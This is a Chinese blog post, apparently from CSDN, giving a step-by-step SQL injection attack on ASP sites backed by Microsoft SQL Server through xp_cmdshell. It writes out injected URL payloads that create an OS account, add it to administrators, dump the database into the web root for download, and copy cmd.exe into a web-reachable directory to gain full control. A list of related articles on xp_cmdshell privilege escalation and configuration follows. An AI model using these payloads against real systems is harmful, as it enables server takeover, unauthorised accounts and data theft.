确定XP_CMDSHELL可执行情况

最新推荐文章于 2024-06-04 17:59:49 发布
最新推荐文章于 2024-06-04 17:59:49 发布
阅读量827 收藏
点赞数
分类专栏: ASP + SQL注入 文章标签: xp 数据库 database 存储 web shell

 若当前连接数据的帐号具有SA权限,且master.dbo.xp_cmdshell扩展存储过程(调用此存储过程可以直接使用操作系统的shell)能够正确执行,则整个计算机可以通过以下几种方法完全控制,以后的所有步骤都可以省
1、HTTP://xxx.xxx.xxx/abc.asp?p=YY&nb ... er>0 abc.asp执行异常但可以得到当前连接数据库的用户名(若显示dbo则代表SA)。
2、HTTP://xxx.xxx.xxx/abc.asp?p=YY ... me()>0 abc.asp执行异常但可以得到当前连接的数据库名。
3、HTTP://xxx.xxx.xxx/abc.asp?p=YY;exec master..xp_cmdshell “net user aaa bbb /add”-- (master是SQL-SERVER的主数据库;名中的分号表示SQL-SERVER执行完分号前的语句名,继续执行其后面的语句;“—”号是注解,表示其后面的所有内容仅为注释,系统并不执行)可以直接增加操作系统帐户aaa,密码为bbb。
4、HTTP://xxx.xxx.xxx/abc.asp?p=YY;exec master..xp_cmdshell “net localgroup administrators aaa /add”-- 把刚刚增加的帐户aaa加到administrators组中。
5、HTTP://xxx.xxx.xxx/abc.asp?p=YY;backuup database 数据库名 to disk='c:/inetpub/wwwroot/save.db' 则把得到的数据内容全部备份到WEB目录下,再用HTTP把此文件下载(当然首选要知道WEB虚拟目录)。
6、通过复制CMD创建UNICODE漏洞
HTTP://xxx.xxx.xxx/abc.asp?p=YY;exe ... dbo.xp_cmdshell “copy c:/winnt/system32/cmd.exe c:/inetpub/scripts/cmd.exe” 便制造了一个UNICODE漏洞,通过此漏洞的利用方法,便完成了对整个计算机的控制(当然首选要知道WEB虚拟目录)。

 

netidman
关注
专栏目录
蚁剑ASP连SQLSERVER执行xp_cmdshell爆 驱动程序不支持所需的属性 解决办法
Ca3tie1的博客
12-18 1664
使用ASP连接SQLSERVER sa执行xp_cmdshell爆“-2147217887:ODBC 驱动程序不支持所需的属性错误”。 原因是在source\core\asp\template\database\sqlserver.js中执行SQL语句代码模板中使用Recordset对象的open方法来执行SQL语句,貌似是该方法不支持请求xp_cmdshell这种过程对象,具体我也不清楚,这里...
执行java_怎么在cmd里面运行 java
weixin_35307279的博客
02-12 3359
展开全部方法如下:1、首先62616964757a686964616fe58685e5aeb931333366303130我们在命令行运行Java程序需要借助jdk的环境依赖,打开jdk包,需要找到javac和java两个文件,如下图所示2、打开运行窗口,然后在运行窗口中输入cmd命令,如下图所示3、在CMD命令行界面中我们输入cd命令进入到java程序文件所在的目录,如下图所示4、接下来执行ja...
xp_cmdshell的内容
swort_177的专栏
12-23 980
 xp_cmdshell可以让系统管理员以操作系统命令行解释器的方式执行给定的命令字符串,并以文本行方式返回任何输出,是一个功能非常强大的扩展存贮过程。 一般情况下,xp_cmdshell对管理员来说也是不必要的,xp_cmdshell的消除不会对Server造成任何影响。 可以将xp_cmdshell消除删除方法为:到sql server的查询分析器中,试用存储过程sp_d
SQL 中常用存储过程xp_cmdshell运行cmd命令
Laaguid的博客
04-26 1812
目的: 使用SQL语句,在D盘创建一个文件夹myfile 首先查询系统配置 SELECT * FROM sys.configurations WHERE name='xp_cmdshell' OR name='show advanced options' GO 可以看到他们的值为0,无法配置 打开系统配置: USE master GO RECONFIGURE --先执行一次刷新...
xp_cmdshell 命令的开启与关闭,和状态查询
weixin_30644369的博客
07-03 759
/* EXEC sp_configure ‘allow updates’, 0 RECONFIGURE */ -- 启用: exec sp_configure 'show advanced options',1 reconfigure exec sp_configure 'xp_cmdshell',1 reconfigure --关闭: exec sp_...
master..xp_cmdshell
dainiao01的专栏
06-16 3247
xp_cmdshell     以操作系统命令行解释器的方式执行给定的命令字符串,并以文本行方式返回任何输出。授予非管理用户执行   xp_cmdshell   的权限。             说明     在   Microsoft®   Windows®   95   或   Microsoft   Windows   98   操作系统中执行  
SQL Server文件操作:xp_cmdshell详解
"这篇文档是关于SQL Server数据库中对文件操作的全面指南,特别是如何使用`xp_cmdshell`扩展存储过程来执行系统命令。" 在SQL Server中,有时我们需要执行与文件系统相关的任务,例如读取、写入或管理文件。`xp_cmd...
SQL注入攻击实战指南:从发现到获取管理员权限
在判断后台数据库类型后,攻击者需要确定 XP_CMDSHELL执行情况XP_CMDSHELL 是 Microsoft SQL Server 的扩展存储过程,可以用来执行系统命令。攻击者可以通过执行 XP_CMDSHELL 来上传木马、获取管理员权限等。 ...
MSSQL数据库注入
zhuangsle的博客
08-26 1171
MSSQL数据库注入实践 一、MSSQL注入的基础知识 (一)注入点的检测 1、数据库类型判断 概述 MSSQL数据库中,存在一个系统表sysobjects,可以通过判断这个表是否存在来判断该数据库是否为MSSQL数据库 SQL语句执行 select * from admin where id=1 and exists(select * from sysobjects); # 正常返回结果,则表示存在该数据库表 select * from admin where id=1 and exists(se
xp_cmdshell
得峰的专栏 [网络收藏]
05-04 992
                                         以操作系统命令行解释器的方式执行给定的命令字符串,并以文本行方式返回任何输出。授予非管理用户执行 xp_cmdshell 的权限。说明  在 Microsoft® Windows® 98 操作系统中执行 xp_cmdshell 时,将不把 xp_cmdshell 的返回代码设置为唤醒调用的可执
SQL Server数据库xp_cmdshell提权笔记
最新发布
千寻的博客
06-04 2069
SQL Server数据库xp_cmdshell提权
【SQL Server】xp_cmdshell获取服务器最高权限
qq_43665434的博客
05-23 810
【SQL Server】xp_cmdshell获取服务器最高权限 实验环境:windowsXP + sql server2005 sp_configure —> '显示高级选项’选项用来显示sp_configure系统存储过程高级选项。当‘显示高级选项’设置为1时,可以使用sp_configure列出高级选项,默认值为0。 exec sp_configure 'show advanced options', 1;reconfigure; -- 需将show ad advanced option
给自己刨了个坑,义无反顾的跳下去 ,悲催啊(有关触发器调用xp_cmdshell的一个坑)...
weixin_34143774的博客
06-03 123
---恢复内容开始--- 这样一个需求,某网站有内容更新的话生成一个对应的静态页面。 我的初稿,知道网站更新内容到了数据库,然后数据库的触发器调用xp_cmdshell执行一个写好的 生成html页面的exe。逻辑很清楚,感觉也没什问题。 如果你也同意上面的话,表示你没有考虑全面,我的exe里面也执行了去数据库同一个表里面拿数据 的操作,结果就是exe执行的时候连接超时,报错。...
SQL Server 2012 xp_cmdshell不能执行的解决办法
学习是一种习惯
07-10 7877
        一个很早的系统,数据库一直跑的好好的,但在最近就无法执行压缩备份文件了,以至于1TB的硬盘很快就撑爆了。查了很久也没有找到原因,按照网上的很多方法都试了一遍,结果都不行。        这里要说一下啊,2008版本以后的sql server与之前版本的有很大的不同,就“外围应用“来讲,低版本中都是在操作系统的应用里可以看到的单独的应用,到了高版本后它变成了数据库实例的右键菜单里的一...
SQLServer执行存储过程失败(sys.xp_cmdshell)问题处理
cuanzhutang8944的博客
12-21 1459
今天在调整一备库的备份策略的时候,执行job失败,其中具体错误信息和解决方法记录下,仅供以后参考使用。 错误信息: Date 2016/12/21 11:05:48 Log Job Hist...
SQL Server提权之xp_cmdshell
不曾扬帆,何以至远方
07-17 4421
sql server提权之xp_cmdshell
mssql提权总结
st3pby的博客
12-30 2744
mssql提权总结
SQL Server恢复XP_CMDSHELL功能及安全风险
在实际操作中,使用`XP_CMDSHELL`需要谨慎,因为它可以执行任意系统命令,例如下面的例子展示了如何通过`XP_CMDSHELL`读取和修改系统文件`boot.ini`以开启或关闭远程桌面服务(3389端口): ```sql -- 读取boot.ini...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值